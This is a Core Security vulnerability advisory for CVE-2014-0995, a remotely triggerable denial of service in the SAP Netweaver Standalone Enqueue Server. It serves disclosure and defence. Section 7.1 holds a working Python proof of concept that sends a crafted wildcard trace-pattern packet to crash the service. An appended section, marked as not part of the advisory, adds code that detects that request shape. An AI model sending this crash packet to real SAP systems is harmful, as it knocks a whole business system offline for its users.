Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability


1. **Advisory Information**

Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL: http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release


2. **Vulnerability Information**

Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995


3. **Vulnerability Description**

SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. A vulnerability has been found in SAP Netweaver that could allow an unauthenticated, remote attacker to create denial of service conditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the "Standalone Enqueue Server" service, part of SAP Netweaver Application Server ABAP/Java. The "Standalone Enqueue Server" is a critical component of a SAP Netweaver installation in terms of availability, so a crash of the service renders the whole SAP system unresponsive.


4. **Vulnerable Packages**

. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).

Other versions are probably affected too, but they were not checked.


5. **Vendor Information, Solutions and Workarounds**

Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:

Restrict access to the Standalone Enqueue service by configuring Access Control Lists [4], and restrict access to the Standalone Enqueue Service TCP port 32XX (XX is the instance number).

SAP published a security note [3] with the fix.


6. **Credits**

This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Advisories Team.


7. **Technical Description / Proof of Concept Code**

When the trace level of the service is configured to stop logging when a pattern is found [2], the service does not properly control the amount of recursion, resulting in a stack overflow exception. The vulnerability can be triggered remotely by setting the trace level with a wildcard Trace Pattern.

This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against the vulnerable systems, rendering the Enqueue Server unavailable.

The following Python code can be used to trigger the vulnerability:


7.1. **Proof of Concept**

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))

print "[*] Sending crash packet"
crash = '\xab\xcd\xe1\x23'  # Magic bytes
crash += '\x00\x00\x00\x00'  # Id
crash += '\x00\x00\x00\x5b\x00\x00\x00\x5b'  # Packet/frag length
crash += '\x03\x00\x00\x00'  # Destination/Opcode/MoreFrags/Type
crash += 'ENC\x00'  # Admin Eye-catcher
crash += '\x01\x00\x00\x00'  # Version
crash += '#EAA'  # Admin Eye-catcher
crash += '\x01\x00\x00\x00\x00'  # Len
crash += '\x06\x00\x00\x00\x00\x00'  # Opcode/Flags/RC
crash += '#EAE'  # Admin Eye-catcher
crash += '\x01\x04\x00\x00'  # Version/Action/Limit/Thread
crash += '\x00\x00\x00\x00'
crash += '\x00\x00\x00\x03\x00\x00\x00\x03'  # Trace Level
crash += '\x01'  # Logging
crash += '\x01\x40\x00\x00'  # Max file size
crash += '\x00\x00\x00\x01\x00\x00\x00\x01'  # No. patterns
crash += '\x00\x00\x00\x25#EAH'  # Trace Eye-catcher
crash += '\x01*\x00'  # Trace Pattern
crash += '#EAD'  # Trace Eye-catcher
send_packet(connection, crash)

print "[*] Crash sent !"
-----/


8. **Report Timeline**

. 2014-06-02: Initial notification sent to SAP, including technical description to reproduce the vulnerability. Publication date set to Jun 30, 2014.
. 2014-06-03: Vendor notifies that the tracking number 1153917-2014 was created for this issue.
. 2014-06-26: Core Security requests SAP to inform the status of the advisory.
. 2014-06-30: The vendor informs they were not able to reproduce the issue and they request additional details and a proof of concept.
. 2014-06-30: Core Security sends SAP a full description of the vulnerability including a python script to trigger it.
. 2014-07-11: Core Security asks if the vendor was able to trigger the vulnerability. Additionally we requested to set a publication date for the advisory based on the release of a fix.
. 2014-07-14: The vendor informs they were able to reproduce the issue but they will not be able to provide a timeline for the fix at the time. They inform they will work with high priority on it and will inform us of the planned fix release date.
. 2014-08-12: Core Security asks if the vendor was able to develop a fix and if they have a possible timeline for its availability.
. 2014-08-13: The vendor informs that the fix is undergoing quality checks. They also inform that they can't provide an exact date of publication yet. They also request a 3 months grace period once the patch is available.
. 2014-08-13: Core Security informs SAP that after we get notice that the fix is available to the public we will publish the advisory accordingly and will not wait for the 3 months of grace as requested because that's not our proceeding policy.
. 2014-08-18: The vendor informs that the fix is going to be released with the October patch day, on Tuesday the 14th, of 2014.
. 2014-10-14: The vendor publishes the fix under the security note 2042845.
. 2014-10-15: Core Security releases the advisory.


9. **References**

[1] http://www.sap.com/platform/netweaver/index.epx.
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.


10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.


11. **About Core Security**

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.


12. **Disclaimer**

The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. **PGP/GPG Keys**

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
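Detection logic for the request shape described in section 7, to sit alongside the access restrictions in section 5. This is an added example, not part of the Core Security advisory or of any SAP tool: it classifies one captured length-prefixed frame from TCP port 32NN and flags admin requests that carry a wildcard trace pattern. The names `inspect_frame`, `trace_patterns` and `sample_frame` are hypothetical, the field layout is assumed from the comments in the proof of concept, and the sample frames are constructed with zero filler.

```python
import struct

MAGIC = b"\xab\xcd\xe1\x23"    # magic bytes from the advisory's packet
HDR = struct.Struct("!4sIII")  # magic, id, packet length, fragment length

def trace_patterns(payload: bytes):
    """Return the patterns found between '#EAH' and '#EAD', or None if unclosed."""
    found, pos = [], payload.find(b"#EAH")
    while pos != -1:
        end = payload.find(b"#EAD", pos)
        if end == -1:
            return None
        # Assumption from the PoC layout: one byte, then a NUL-terminated pattern.
        found.append(payload[pos + 5:end].split(b"\x00")[0])
        pos = payload.find(b"#EAH", end)
    return found

def inspect_frame(frame: bytes) -> str:
    """Classify one length-prefixed frame seen on TCP port 32NN."""
    if len(frame) < 4 + HDR.size + 4:
        return "malformed"
    (declared,) = struct.unpack_from("!I", frame)
    body = frame[4:]
    magic, _id, pkt_len, frag_len = HDR.unpack_from(body)
    if magic != MAGIC:
        return "not-enqueue"
    if declared != len(body) or frag_len > pkt_len:
        return "malformed"
    payload = body[HDR.size + 4:]  # skip destination/opcode/more-frags/type
    if not payload.startswith(b"ENC\x00"):
        return "data"              # no admin eye-catcher
    patterns = trace_patterns(payload)
    if patterns is None:
        return "malformed"
    if any(b"*" in p for p in patterns):
        return "admin-trace-wildcard"  # request shape described in section 7
    return "admin-trace" if patterns else "admin"

def sample_frame(pattern: bytes) -> bytes:
    """Constructed input: real eye-catchers, zero filler, not a valid request."""
    payload = b"ENC\x00" + bytes(4) + b"#EAA" + bytes(8) + b"#EAE" + bytes(8)
    payload += b"#EAH\x01" + pattern + b"\x00#EAD"
    size = HDR.size + 4 + len(payload)
    body = HDR.pack(MAGIC, 0, size, size) + bytes(4) + payload
    return struct.pack("!I", len(body)) + body

if __name__ == "__main__":
    print([inspect_frame(sample_frame(p)) for p in (b"*", b"lock_a")])
```

Feed it reassembled TCP payloads from a sensor in front of the Enqueue port; any admin verdict from a source outside the permitted application servers is worth an alert, whether or not the pattern is a wildcard.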